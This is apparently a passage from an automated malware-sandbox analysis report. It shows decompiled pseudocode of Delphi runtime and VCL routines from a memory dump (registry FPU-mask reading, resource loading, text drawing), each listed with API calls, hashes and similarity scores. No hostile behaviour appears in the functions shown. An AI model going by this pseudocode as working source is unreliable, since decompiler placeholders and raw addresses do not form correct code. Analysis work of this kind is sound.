                                  				_t84 = __ecx;
                                  				_t94 = __ecx;
                                  				_t95 = __edx;
                                  				_t83 = __eax;
                                  				VirtualQuery(__edx,  &_v824, 0x1c);
                                  				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
                                  					_t45 =  *0x4bc668; // 0x400000
                                  					GetModuleFileNameA(_t45,  &_v538, 0x105);
                                  					_v16 = E0040C834(_t95);
                                  				} else {
                                  					_v16 = _t95 - _v824.AllocationBase;
                                  				}
                                  				E004094D0( &_v277, 0x104, E0040D990( &_v538, _t84, 0x5c) + 1);
                                  				_v8 = 0x40c9d0;
                                  				_v12 = 0x40c9d0;
                                  				_t91 =  *0x407b7c; // 0x407bc8
                                  				if(E004037A4(_t83, _t91) != 0) {
                                  					_v8 = E00404898( *((intOrPtr*)(_t83 + 4)));
                                  					_t78 = E0040946C(_v8, _t94);
                                  					if(_t78 != 0) {
                                  						_t91 = _v8;
                                  						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
                                  							_v12 = 0x40c9d4;
                                  						}
                                  					}
                                  				}
                                  				_t58 =  *0x4bb20c; // 0x4078e4
                                  				_t21 = _t58 + 4; // 0xffd0
                                  				_t60 =  *0x4bc668; // 0x400000
                                  				LoadStringA(E00405A30(_t60, 0x104, _t91),  *_t21,  &_v794, 0x100);
                                  				E0040355C( *_t83,  &_v1120);
                                  				_v864 =  &_v1120;
                                  				_v860 = 4;
                                  				_v856 =  &_v277;
                                  				_v852 = 6;
                                  				_v848 = _v16;
                                  				_v844 = 5;
                                  				_v840 = _v8;
                                  				_v836 = 6;
                                  				_v832 = _v12;
                                  				_v828 = 6;
                                  				E00409B40(_t94, _a4, _t102, 4,  &_v864);
                                  				return E0040946C(_t94, _t94);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C85C
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C880
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C89B
                                  • LoadStringA.USER32 ref: 0040C93F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: x@
                                  • API String ID: 3990497365-1963665138
                                  • Opcode ID: ab4b15ff4bbae09c13e02e085f4b46d76bc37b2070cb6e6f5ff62ae920f064c7
                                  • Instruction ID: eefebdac6144b534ac7d4185644087d7df9ced5bc74a4d82f61a036f97308ad6
                                  • Opcode Fuzzy Hash: ab4b15ff4bbae09c13e02e085f4b46d76bc37b2070cb6e6f5ff62ae920f064c7
                                  • Instruction Fuzzy Hash: B441FDB19002589FDB11EB69CC85BDAB7B9AB08304F0441F6A948F7291D7789F44CF55
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040C83E(intOrPtr* __eax, void* __ecx, void* __edx, intOrPtr _a4) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				char _v277;
                                  				char _v538;
                                  				char _v794;
                                  				struct _MEMORY_BASIC_INFORMATION _v824;
                                  				char _v828;
                                  				intOrPtr _v832;
                                  				char _v836;
                                  				intOrPtr _v840;
                                  				char _v844;
                                  				intOrPtr _v848;
                                  				char _v852;
                                  				char* _v856;
                                  				char _v860;
                                  				char _v864;
                                  				char _v1120;
                                  				void* __edi;
                                  				struct HINSTANCE__* _t45;
                                  				intOrPtr _t58;
                                  				struct HINSTANCE__* _t60;
                                  				void* _t78;
                                  				intOrPtr* _t84;
                                  				void* _t97;
                                  				void* _t100;
                                  				void* _t114;
                                  
                                  				_t86 = __ecx;
                                  				_t97 = __ecx;
                                  				_t100 = __edx;
                                  				_t84 = __eax;
                                  				VirtualQuery(__edx,  &_v824, 0x1c);
                                  				if(_v824.State != 0x1000 || GetModuleFileNameA(_v824.AllocationBase,  &_v538, 0x105) == 0) {
                                  					_t45 =  *0x4bc668; // 0x400000
                                  					GetModuleFileNameA(_t45,  &_v538, 0x105);
                                  					_v16 = E0040C834(_t100);
                                  				} else {
                                  					_v16 = _t100 - _v824.AllocationBase;
                                  				}
                                  				E004094D0( &_v277, 0x104, E0040D990( &_v538, _t86, 0x5c) + 1);
                                  				_v8 = 0x40c9d0;
                                  				_v12 = 0x40c9d0;
                                  				_t93 =  *0x407b7c; // 0x407bc8
                                  				if(E004037A4(_t84, _t93) != 0) {
                                  					_v8 = E00404898( *((intOrPtr*)(_t84 + 4)));
                                  					_t78 = E0040946C(_v8, _t97);
                                  					if(_t78 != 0) {
                                  						_t93 = _v8;
                                  						if( *((char*)(_v8 + _t78 - 1)) != 0x2e) {
                                  							_v12 = 0x40c9d4;
                                  						}
                                  					}
                                  				}
                                  				_t58 =  *0x4bb20c; // 0x4078e4
                                  				_t21 = _t58 + 4; // 0xffd0
                                  				_t60 =  *0x4bc668; // 0x400000
                                  				LoadStringA(E00405A30(_t60, 0x104, _t93),  *_t21,  &_v794, 0x100);
                                  				E0040355C( *_t84,  &_v1120);
                                  				_v864 =  &_v1120;
                                  				_v860 = 4;
                                  				_v856 =  &_v277;
                                  				_v852 = 6;
                                  				_v848 = _v16;
                                  				_v844 = 5;
                                  				_v840 = _v8;
                                  				_v836 = 6;
                                  				_v832 = _v12;
                                  				_v828 = 6;
                                  				E00409B40(_t97, _a4, _t114, 4,  &_v864);
                                  				return E0040946C(_t97, _t97);
                                  			}

                                  APIs
                                  • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C85C
                                  • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C880
                                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C89B
                                  • LoadStringA.USER32 ref: 0040C93F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: FileModuleName$LoadQueryStringVirtual
                                  • String ID: x@
                                  • API String ID: 3990497365-1963665138
                                  • Opcode ID: 16e1ada8cc568decffdfb33953bd20af61900dc27c540830cf1c4295d3441a52
                                  • Instruction ID: e54f558ca846f801a4dcb179523658493c1ea09cb64bf8224657a482f743d531
                                  • Opcode Fuzzy Hash: 16e1ada8cc568decffdfb33953bd20af61900dc27c540830cf1c4295d3441a52
                                  • Instruction Fuzzy Hash: 5C41FEB0A042589FDB11EB69CC85BDAB7F99B08304F0441F6A948F7291D7789F44CF59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00464C44(char __edx, void* __edi) {
                                  				char _v5;
                                  				void* __ebx;
                                  				void* __ecx;
                                  				void* __ebp;
                                  				intOrPtr _t25;
                                  				intOrPtr* _t28;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t48;
                                  				intOrPtr _t59;
                                  				intOrPtr _t60;
                                  				intOrPtr _t61;
                                  				intOrPtr _t62;
                                  				intOrPtr _t65;
                                  				void* _t66;
                                  				char _t67;
                                  				void* _t77;
                                  				struct HDC__* _t78;
                                  				void* _t79;
                                  				void* _t80;
                                  
                                  				_t77 = __edi;
                                  				_t67 = __edx;
                                  				if(__edx != 0) {
                                  					_t80 = _t80 + 0xfffffff0;
                                  					_t25 = E00403984(_t25, _t79);
                                  				}
                                  				_v5 = _t67;
                                  				_t65 = _t25;
                                  				E00424FB8(_t66, 0);
                                  				_t28 =  *0x4badb8; // 0x4a059c
                                  				 *((intOrPtr*)(_t28 + 4)) = _t65;
                                  				 *_t28 = 0x464fe8;
                                  				_t29 =  *0x4badcc; // 0x4a05a4
                                  				 *((intOrPtr*)(_t29 + 4)) = _t65;
                                  				 *_t29 = 0x464ff4;
                                  				E00465000(_t65);
                                  				 *((intOrPtr*)(_t65 + 0x3c)) = GetKeyboardLayout(0);
                                  				 *((intOrPtr*)(_t65 + 0x4c)) = E004035DC(1);
                                  				 *((intOrPtr*)(_t65 + 0x50)) = E004035DC(1);
                                  				 *((intOrPtr*)(_t65 + 0x54)) = E004035DC(1);
                                  				 *((intOrPtr*)(_t65 + 0x58)) = E004035DC(1);
                                  				 *((intOrPtr*)(_t65 + 0x7c)) = E004035DC(1);
                                  				_t78 = GetDC(0);
                                  				 *((intOrPtr*)(_t65 + 0x40)) = GetDeviceCaps(_t78, 0x5a);
                                  				ReleaseDC(0, _t78);
                                  				_t11 = _t65 + 0x58; // 0x45dfdc6e
                                  				_t48 =  *0x4baf90; // 0x4bc920
                                  				 *((intOrPtr*)( *_t48))(0, 0, E00461418,  *_t11);
                                  				 *((intOrPtr*)(_t65 + 0x84)) = E004282BC(1);
                                  				 *((intOrPtr*)(_t65 + 0x88)) = E004282BC(1);
                                  				 *((intOrPtr*)(_t65 + 0x80)) = E004282BC(1);
                                  				E00465498(_t65, _t65, _t66, _t77);
                                  				_t15 = _t65 + 0x84; // 0x38004010
                                  				_t59 =  *_t15;
                                  				 *((intOrPtr*)(_t59 + 0xc)) = _t65;
                                  				 *((intOrPtr*)(_t59 + 8)) = 0x465360;
                                  				_t18 = _t65 + 0x88; // 0x90000000
                                  				_t60 =  *_t18;
                                  				 *((intOrPtr*)(_t60 + 0xc)) = _t65;
                                  				 *((intOrPtr*)(_t60 + 8)) = 0x465360;
                                  				_t21 = _t65 + 0x80; // 0xe8000000
                                  				_t61 =  *_t21;
                                  				 *((intOrPtr*)(_t61 + 0xc)) = _t65;
                                  				 *((intOrPtr*)(_t61 + 8)) = 0x465360;
                                  				_t62 = _t65;
                                  				if(_v5 != 0) {
                                  					E004039DC(_t62);
                                  					_pop( *[fs:0x0]);
                                  				}
                                  				return _t65;
                                  			}

                                  APIs
                                  • GetKeyboardLayout.USER32 ref: 00464C89
                                  • GetDC.USER32(00000000), ref: 00464CDE
                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00464CE8
                                  • ReleaseDC.USER32(00000000,00000000), ref: 00464CF3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CapsDeviceKeyboardLayoutRelease
                                  • String ID: pkB
                                  • API String ID: 3331096196-3043697554
                                  • Opcode ID: d9a37da496382b2c90e0957f60970851febd5645a27e2659bab8a2e3f111b15f
                                  • Instruction ID: ca57cebd03d830e7dfbb6e1b30c18f23ade59c1812026a35f6992e7b80faba1a
                                  • Opcode Fuzzy Hash: d9a37da496382b2c90e0957f60970851febd5645a27e2659bab8a2e3f111b15f
                                  • Instruction Fuzzy Hash: 4731E5706012009FD750EF2ADC82B497BE4BB04319F4590BEE808DF3A6EA79A805CB59
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E0040E27C() {
                                  				intOrPtr* _v12;
                                  				struct HINSTANCE__** _t8;
                                  				intOrPtr* _t10;
                                  				struct HINSTANCE__** _t17;
                                  				struct HRSRC__* _t19;
                                  				struct HINSTANCE__** _t20;
                                  				struct HINSTANCE__* _t26;
                                  				void* _t27;
                                  				intOrPtr* _t28;
                                  
                                  				_t28 = _t27 + 0xfffffff8;
                                  				_t8 =  *0x4bae44; // 0x4bc030
                                  				if( *_t8 == 0) {
                                  					 *_t28 = 0;
                                  					_t10 =  *0x4bb148; // 0x4a0034
                                  					_v12 =  *_t10;
                                  					if(_v12 != 0) {
                                  						while(1) {
                                  							_t26 =  *(_v12 + 4);
                                  							 *_t28 = LoadResource(_t26, FindResourceA(_t26, "DVCLAL", 0xa));
                                  							if( *_t28 != 0) {
                                  								goto L5;
                                  							}
                                  							_v12 =  *_v12;
                                  							if(_v12 != 0) {
                                  								continue;
                                  							}
                                  							goto L5;
                                  						}
                                  					}
                                  				} else {
                                  					_t17 =  *0x4bae44; // 0x4bc030
                                  					_t19 = FindResourceA( *_t17, "DVCLAL", 0xa);
                                  					_t20 =  *0x4bae44; // 0x4bc030
                                  					 *_t28 = LoadResource( *_t20, _t19);
                                  				}
                                  				L5:
                                  				return  *_t28;
                                  			}

                                  APIs
                                  • FindResourceA.KERNEL32 ref: 0040E29A
                                  • LoadResource.KERNEL32(00400000,00000000,00400000,DVCLAL,0000000A), ref: 0040E2A8
                                  • FindResourceA.KERNEL32 ref: 0040E2D8
                                  • LoadResource.KERNEL32(?,00000000,?,DVCLAL,0000000A), ref: 0040E2DF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Resource$FindLoad
                                  • String ID: DVCLAL
                                  • API String ID: 2619053042-4101055290
                                  • Opcode ID: d204bd14a2e0ee66408747a27a8ac497611e44c554d43372367151b9373ff293
                                  • Instruction ID: cb49d3c5f3fc5c2f6b4cb8189aa6aef9e964a8eed3da7b6a6c98e0c10e513989
                                  • Opcode Fuzzy Hash: d204bd14a2e0ee66408747a27a8ac497611e44c554d43372367151b9373ff293
                                  • Instruction Fuzzy Hash: 4111F774608310EFD310EB69C985B5A77E8EB49714F01487EF485AB3E0C7789C50DB1A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 65%
                                  			E00403478() {
                                  				void* _v8;
                                  				char _v12;
                                  				int _v16;
                                  				signed short _t12;
                                  				signed short _t14;
                                  				intOrPtr _t27;
                                  				void* _t29;
                                  				void* _t31;
                                  				intOrPtr _t32;
                                  
                                  				_t29 = _t31;
                                  				_t32 = _t31 + 0xfffffff4;
                                  				_v12 =  *0x4a0020 & 0x0000ffff;
                                  				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
                                  					_t12 =  *0x4a0020; // 0x1372
                                  					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
                                  					 *0x4a0020 = _t14;
                                  					return _t14;
                                  				} else {
                                  					_push(_t29);
                                  					_push(E004034E9);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t32;
                                  					_v16 = 4;
                                  					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
                                  					_pop(_t27);
                                  					 *[fs:eax] = _t27;
                                  					_push(0x4034f0);
                                  					return RegCloseKey(_v8);
                                  				}
                                  			}

                                  APIs
                                  • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 0040349A
                                  • RegQueryValueExA.ADVAPI32 ref: 004034CD
                                  • RegCloseKey.ADVAPI32(?), ref: 004034E3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CloseOpenQueryValue
                                  • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                  • API String ID: 3677997916-4173385793
                                  • Opcode ID: 922a424f1b6665b063de74352bf787c5a4fa1408f7364e2ef6a2d45f96a76b2b
                                  • Instruction ID: 93877b4532e35da09450cc135ee1be1996d0c3ff18c7b21d8caccd55e56241c7
                                  • Opcode Fuzzy Hash: 922a424f1b6665b063de74352bf787c5a4fa1408f7364e2ef6a2d45f96a76b2b
                                  • Instruction Fuzzy Hash: 4D017575944308BAE711DFA0DC42FA97BACE709705F6000B6BE00E65D1F6795A10D75C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 67%
                                  			E00415558(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
                                  				signed short* _v8;
                                  				signed int _v12;
                                  				char _v13;
                                  				signed int _v16;
                                  				signed int _v18;
                                  				void* _v24;
                                  				void* _v28;
                                  				signed int _v44;
                                  				void* __ebp;
                                  				signed short _t136;
                                  				signed short* _t256;
                                  				intOrPtr _t307;
                                  				intOrPtr _t310;
                                  				intOrPtr _t318;
                                  				intOrPtr _t325;
                                  				intOrPtr _t333;
                                  				signed int _t338;
                                  				void* _t346;
                                  				void* _t348;
                                  				intOrPtr _t349;
                                  
                                  				_t353 = __fp0;
                                  				_t346 = _t348;
                                  				_t349 = _t348 + 0xffffffd8;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t256 = __eax;
                                  				_v13 = 1;
                                  				_t338 =  *((intOrPtr*)(__eax));
                                  				if((_t338 & 0x00000fff) >= 0x10f) {
                                  					_t136 =  *_v8;
                                  					if(_t136 != 0) {
                                  						if(_t136 != 1) {
                                  							if(E00417934(_t338,  &_v24) != 0) {
                                  								_push( &_v18);
                                  								if( *((intOrPtr*)( *_v24 + 8))() == 0) {
                                  									_t341 =  *_v8;
                                  									if(( *_v8 & 0x00000fff) >= 0x10f) {
                                  										if(E00417934(_t341,  &_v28) != 0) {
                                  											_push( &_v16);
                                  											if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                  												E0040FF8C(0xb);
                                  												goto L46;
                                  											} else {
                                  												if( *_t256 == _v16) {
                                  													_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                  													goto L46;
                                  												} else {
                                  													_push( &_v44);
                                  													L0040EEB8();
                                  													_push(_t346);
                                  													_push(0x415939);
                                  													_push( *[fs:eax]);
                                  													 *[fs:eax] = _t349;
                                  													_t268 = _v16 & 0x0000ffff;
                                  													E00410FB0( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                  													if(_v44 != _v16) {
                                  														E0040FE9C(_t268);
                                  													}
                                  													_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                  													_pop(_t307);
                                  													 *[fs:eax] = _t307;
                                  													_push(0x41596c);
                                  													return E00410728( &_v44);
                                  												}
                                  											}
                                  										} else {
                                  											E0040FF8C(0xb);
                                  											goto L46;
                                  										}
                                  									} else {
                                  										_push( &_v44);
                                  										L0040EEB8();
                                  										_push(_t346);
                                  										_push(0x415883);
                                  										_push( *[fs:eax]);
                                  										 *[fs:eax] = _t349;
                                  										_t273 =  *_v8 & 0x0000ffff;
                                  										E00410FB0( &_v44,  *_v8 & 0x0000ffff, _t256, __edi, __fp0);
                                  										if( *_v8 != _v44) {
                                  											E0040FE9C(_t273);
                                  										}
                                  										_v13 = E004153CC( &_v44, _v12, _v8, _t353);
                                  										_pop(_t310);
                                  										 *[fs:eax] = _t310;
                                  										_push(0x41596c);
                                  										return E00410728( &_v44);
                                  									}
                                  								} else {
                                  									if( *_v8 == _v18) {
                                  										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                  										goto L46;
                                  									} else {
                                  										_push( &_v44);
                                  										L0040EEB8();
                                  										_push(_t346);
                                  										_push(0x4157e1);
                                  										_push( *[fs:eax]);
                                  										 *[fs:eax] = _t349;
                                  										_t278 = _v18 & 0x0000ffff;
                                  										E00410FB0( &_v44, _v18 & 0x0000ffff, _v8, __edi, __fp0);
                                  										if(_v44 != _v18) {
                                  											E0040FE9C(_t278);
                                  										}
                                  										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v24 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                  										_pop(_t318);
                                  										 *[fs:eax] = _t318;
                                  										_push(0x41596c);
                                  										return E00410728( &_v44);
                                  									}
                                  								}
                                  							} else {
                                  								E0040FF8C(__ecx);
                                  								goto L46;
                                  							}
                                  						} else {
                                  							_v13 = E004151AC(_v12, 2);
                                  							goto L46;
                                  						}
                                  					} else {
                                  						_v13 = E00415198(0, 1);
                                  						goto L46;
                                  					}
                                  				} else {
                                  					if(_t338 != 0) {
                                  						if(_t338 != 1) {
                                  							if(E00417934( *_v8,  &_v28) != 0) {
                                  								_push( &_v16);
                                  								if( *((intOrPtr*)( *_v28 + 4))() == 0) {
                                  									_push( &_v44);
                                  									L0040EEB8();
                                  									_push(_t346);
                                  									_push(0x4156f1);
                                  									_push( *[fs:eax]);
                                  									 *[fs:eax] = _t349;
                                  									_t284 =  *_t256 & 0x0000ffff;
                                  									E00410FB0( &_v44,  *_t256 & 0x0000ffff, _v8, __edi, __fp0);
                                  									if((_v44 & 0x00000fff) !=  *_t256) {
                                  										E0040FE9C(_t284);
                                  									}
                                  									_v13 = E004153CC(_t256, _v12,  &_v44, _t353);
                                  									_pop(_t325);
                                  									 *[fs:eax] = _t325;
                                  									_push(0x41596c);
                                  									return E00410728( &_v44);
                                  								} else {
                                  									if( *_t256 == _v16) {
                                  										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                  										goto L46;
                                  									} else {
                                  										_push( &_v44);
                                  										L0040EEB8();
                                  										_push(_t346);
                                  										_push(0x415663);
                                  										_push( *[fs:eax]);
                                  										 *[fs:eax] = _t349;
                                  										_t289 = _v16 & 0x0000ffff;
                                  										E00410FB0( &_v44, _v16 & 0x0000ffff, _t256, __edi, __fp0);
                                  										if((_v44 & 0x00000fff) != _v16) {
                                  											E0040FE9C(_t289);
                                  										}
                                  										_v13 =  *((intOrPtr*)(0x4a048c + _v12 * 2 + ( *((intOrPtr*)( *_v28 + 0x34))(_v12) & 0x0000007f) - 0x1c));
                                  										_pop(_t333);
                                  										 *[fs:eax] = _t333;
                                  										_push(0x41596c);
                                  										return E00410728( &_v44);
                                  									}
                                  								}
                                  							} else {
                                  								E0040FF8C(__ecx);
                                  								goto L46;
                                  							}
                                  						} else {
                                  							_v13 = E004151AC(_v12, 0);
                                  							goto L46;
                                  						}
                                  					} else {
                                  						_v13 = E00415198(1, 0);
                                  						L46:
                                  						return _v13;
                                  					}
                                  				}
                                  			}

                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cf131c35df834e9a010ecf6ff43a72b3c71a0114e57c817e5c53f49833bd1baa
                                  • Instruction ID: 9e7437ee4a2b1a65b2a14c2387ad9f96a28026aae9e6e3088ce84a9c5d14dde5
                                  • Opcode Fuzzy Hash: cf131c35df834e9a010ecf6ff43a72b3c71a0114e57c817e5c53f49833bd1baa
                                  • Instruction Fuzzy Hash: 43D1B539A00549DFCB10EF94C4819EDBBB5EF89314F9444A6F800B7751D738AE8ACB69
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 85%
                                  			E00457C3C(void* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, int _a4, char _a8, struct tagRECT* _a12) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				void* _v16;
                                  				struct tagRECT _v32;
                                  				void* _t53;
                                  				int _t63;
                                  				CHAR* _t65;
                                  				void* _t76;
                                  				void* _t78;
                                  				int _t89;
                                  				CHAR* _t91;
                                  				int _t117;
                                  				intOrPtr _t127;
                                  				void* _t139;
                                  				void* _t144;
                                  				char _t153;
                                  
                                  				_t120 = __ecx;
                                  				_t143 = _t144;
                                  				_v16 = 0;
                                  				_v12 = __ecx;
                                  				_v8 = __edx;
                                  				_t139 = __eax;
                                  				_t117 = _a4;
                                  				_push(_t144);
                                  				_push(0x457e20);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t144 + 0xffffffe4;
                                  				_t53 = E00459C14(__eax);
                                  				_t135 = _t53;
                                  				if(_t53 != 0 && E0045B280(_t135) != 0) {
                                  					if((_t117 & 0x00000000) != 0) {
                                  						__eflags = (_t117 & 0x00000002) - 2;
                                  						if((_t117 & 0x00000002) == 2) {
                                  							_t117 = _t117 & 0xfffffffd;
                                  							__eflags = _t117;
                                  						}
                                  					} else {
                                  						_t117 = _t117 & 0xffffffff | 0x00000002;
                                  					}
                                  					_t117 = _t117 | 0x00020000;
                                  				}
                                  				E00404470( &_v16, _v12);
                                  				if((_t117 & 0x00000004) == 0) {
                                  					L12:
                                  					E004047E4(_v16, 0x457e44);
                                  					if(_t153 != 0) {
                                  						E00428D80( *((intOrPtr*)(_v8 + 0x14)), _t120, 1, _t135, _t143, __eflags);
                                  						__eflags =  *((char*)(_t139 + 0x3a));
                                  						if( *((char*)(_t139 + 0x3a)) != 0) {
                                  							_t136 =  *((intOrPtr*)(_v8 + 0xc));
                                  							__eflags = E00428750( *((intOrPtr*)(_v8 + 0xc))) |  *0x457e48;
                                  							E0042875C( *((intOrPtr*)(_v8 + 0xc)), E00428750( *((intOrPtr*)(_v8 + 0xc))) |  *0x457e48, _t136, _t139, _t143);
                                  						}
                                  						__eflags =  *((char*)(_t139 + 0x39));
                                  						if( *((char*)(_t139 + 0x39)) != 0) {
                                  							L24:
                                  							_t63 = E00404698(_v16);
                                  							_t65 = E00404898(_v16);
                                  							DrawTextA(E004294DC(_v8), _t65, _t63, _a12, _t117);
                                  							L25:
                                  							_pop(_t127);
                                  							 *[fs:eax] = _t127;
                                  							_push(0x457e27);
                                  							return E004043D8( &_v16);
                                  						} else {
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								OffsetRect(_a12, 1, 1);
                                  								E00428490( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                  								_t89 = E00404698(_v16);
                                  								_t91 = E00404898(_v16);
                                  								DrawTextA(E004294DC(_v8), _t91, _t89, _a12, _t117);
                                  								OffsetRect(_a12, 0xffffffff, 0xffffffff);
                                  							}
                                  							__eflags = _a8;
                                  							if(_a8 == 0) {
                                  								L23:
                                  								E00428490( *((intOrPtr*)(_v8 + 0xc)), 0xff000010);
                                  							} else {
                                  								_t76 = E00427FD0(0xff00000d);
                                  								_t78 = E00427FD0(0xff000010);
                                  								__eflags = _t76 - _t78;
                                  								if(_t76 != _t78) {
                                  									goto L23;
                                  								}
                                  								E00428490( *((intOrPtr*)(_v8 + 0xc)), 0xff000014);
                                  							}
                                  							goto L24;
                                  						}
                                  					}
                                  					if((_t117 & 0x00000004) == 0) {
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_v32.top = _v32.top + 4;
                                  						DrawEdge(E004294DC(_v8),  &_v32, 6, 2);
                                  					}
                                  					goto L25;
                                  				} else {
                                  					if(_v16 == 0) {
                                  						L11:
                                  						E004046A0( &_v16, 0x457e38);
                                  						goto L12;
                                  					}
                                  					if( *_v16 != 0x26) {
                                  						goto L12;
                                  					}
